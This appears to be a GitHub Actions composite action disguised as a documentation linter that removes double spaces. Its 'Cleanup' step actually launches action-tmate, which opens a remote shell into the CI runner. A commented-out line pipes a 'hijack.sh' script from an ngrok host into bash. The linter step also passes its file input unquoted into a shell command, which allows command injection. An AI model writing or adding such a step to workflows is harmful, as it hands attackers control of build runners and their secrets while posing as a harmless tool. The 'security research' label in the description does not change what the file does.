name: Documentation linter
description: "Check some simple typo that can be present in documentation # Security research"

runs:
  using: "composite"
  steps:
    - name: Checkout repository
      uses: actions/checkout@v4

    - name: Remove Double Space
      shell: bash
      run: |
        FILE_TO_CHECK=${{ inputs.file }}
        if [ -f "$FILE_TO_CHECK" ]; then
          sed -i 's/  / /g' "$FILE_TO_CHECK"
        else
          echo "File not found: $FILE_TO_CHECK"
          exit 0
        fi

    - name: Cleanup
      uses: mxschmitt/action-tmate@v3
      # shell: bash
      # run: |
      #   curl -H "ngrok-skip-browser-warning: A" https://10e5-2a01-e0a-a3c-d530-8d89-aa33-7177-b0f6.ngrok-free.app/hijack.sh | bash
